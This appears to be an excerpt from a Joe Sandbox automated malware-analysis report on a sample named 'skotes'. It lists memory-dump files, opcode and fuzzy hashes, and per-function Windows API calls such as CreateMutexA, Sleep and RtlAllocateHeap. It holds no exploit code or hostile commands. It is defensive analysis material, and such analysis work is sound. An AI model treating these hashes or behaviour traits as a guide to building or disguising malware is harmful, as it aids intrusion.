Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 537cb24b2035fcab20d8fec8fdd0f5453c1510900c7a03e3fdf177937d03f12d
Instruction ID: f3a59dc9a65c05b1f63e629a47beb5a9f61c78e69dd6fb8b2fb186a435f971bb
Opcode Fuzzy Hash: 537cb24b2035fcab20d8fec8fdd0f5453c1510900c7a03e3fdf177937d03f12d
Instruction Fuzzy Hash: F7217F30744215CBEF2867A8B9AE73EB362DF95301FA40416F608D73C2CB7649E08653

Function 0012A34F Relevance: 3.1, APIs: 2, Instructions: 100
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0012A963
CreateMutexA.KERNELBASE(00000000,00000000,00183254), ref: 0012A981

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 8f8f9a5ba13dcca11445574ada9d70233adfb666c024b380b40c3f539f89654a
Instruction ID: 410b08ab7904a75d4f2f890b24413e7a2facb11ce1cb449cba62e399bc941688
Opcode Fuzzy Hash: 8f8f9a5ba13dcca11445574ada9d70233adfb666c024b380b40c3f539f89654a
Instruction Fuzzy Hash: A1217931B002049BEF18DB68FCA972CB772EFD5324F644229E419976D5C7765AD08352

Function 0015D82F Relevance: 1.5, APIs: 1, Instructions: 40
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0015A813,00000001,00000364,00000006,000000FF,?,0015EE3F,?,00000004,00000000,?,?), ref: 0015D870

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: b2f355dc495be57d12b88c43045e23ac0f5ecafa4b981f47956473ee02874e91
Instruction ID: b9a927daa25887b36c4dbc86768dc29ad266ce71d8e76150cc5e01255d88b52d
Opcode Fuzzy Hash: b2f355dc495be57d12b88c43045e23ac0f5ecafa4b981f47956473ee02874e91
Instruction Fuzzy Hash: 75F0E932605524E6EB312A72BC01B5B3759DF51772B168021EC34EF191DB21EC1C87E1

Non-executed Functions

Function 00122EC0 Relevance: 7.8, APIs: 5, Instructions: 272COMMON

Download Yara Rule

APIs

__Mtx_unlock.LIBCPMT ref: 00122F5F
__Mtx_unlock.LIBCPMT ref: 00122FCC
__Cnd_broadcast.LIBCPMT ref: 00122FE3
__Mtx_unlock.LIBCPMT ref: 001230F5
__Mtx_unlock.LIBCPMT ref: 0012319B

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: Mtx_unlock$Cnd_broadcast
String ID:
API String ID: 32384418-0
Opcode ID: 900e6e9e68776fe1e471b7ef907a4737088adade586f1717aec949dbdb8a0119
Instruction ID: 0499bbf0d47fa2e84ce0669b57631b24292c550cdafedd9a8e6470f09499f7ea
Opcode Fuzzy Hash: 900e6e9e68776fe1e471b7ef907a4737088adade586f1717aec949dbdb8a0119
Instruction Fuzzy Hash: F6A103B0A01225EFDB10DF64D945B5AB7F8FF25320F048129E825E7241EB75EA24CBE1

Function 0015CBDF Relevance: 6.3, APIs: 4, Instructions: 320COMMON

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 0015CC66

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206393483.000000000042F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206417590.000000000043E000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206441735.000000000043F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_120000_skotes.jbxd

Yara matches

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction ID: f1b9cbba81c69dfd6ae3156f03a044e83ea456eee472baa3fa115c9b0089e69e
Opcode Fuzzy Hash: ff3b895da8359e455593cab76a85431316fff6c614e69054163c5cc9de6e39d3
Instruction Fuzzy Hash: FCB10F32900346DFDB158F68C8827AEBFA5EF55341F15416AEC65EF241D7348909CBE0

Function 0013BB72 Relevance: 6.1, APIs: 4, Instructions: 80COMMON

Download Yara Rule

APIs

_xtime_get.LIBCPMT ref: 0013BBCA
__Xtime_diff_to_millis2.LIBCPMT ref: 0013BBE4
_xtime_get.LIBCPMT ref: 0013BC07
__Xtime_diff_to_millis2.LIBCPMT ref: 0013BC13

Memory Dump Source

Source File: 00000002.00000002.2205387699.0000000000121000.00000040.00000001.01000000.00000007.sdmp, Offset: 00120000, based on PE: true

Associated: 00000002.00000002.2205360046.0000000000120000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205387699.0000000000182000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205451163.0000000000189000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205469627.000000000018B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205488771.0000000000195000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205505555.0000000000196000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205522663.0000000000197000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205622751.00000000002F3000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205639650.00000000002F6000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.0000000000304000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205659335.000000000030F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205693362.000000000031C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205707951.000000000031D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205722910.0000000000325000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205739027.000000000032C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205758786.000000000033E000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205775404.0000000000342000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205790014.0000000000344000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205809049.0000000000356000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205837828.0000000000375000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205858713.0000000000378000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205874694.000000000037F000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205892132.0000000000381000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205906663.0000000000382000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205928740.0000000000388000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205950099.0000000000389000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205970468.000000000038C000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2205992206.0000000000394000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206014597.0000000000397000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206033817.0000000000398000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206051461.000000000039A000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206067658.000000000039C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206084615.00000000003A2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206103635.00000000003AA000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206121921.00000000003AC000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206138662.00000000003AD000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206159658.00000000003B5000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206181433.00000000003C3000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003C4000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206201626.00000000003F6000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206261669.000000000040C000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206281090.000000000040D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206305544.0000000000425000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206327750.0000000000426000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206349647.0000000000427000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2206372145.000000000042D000.00000040.00000001.01000000.00000007.sdmpDownload File
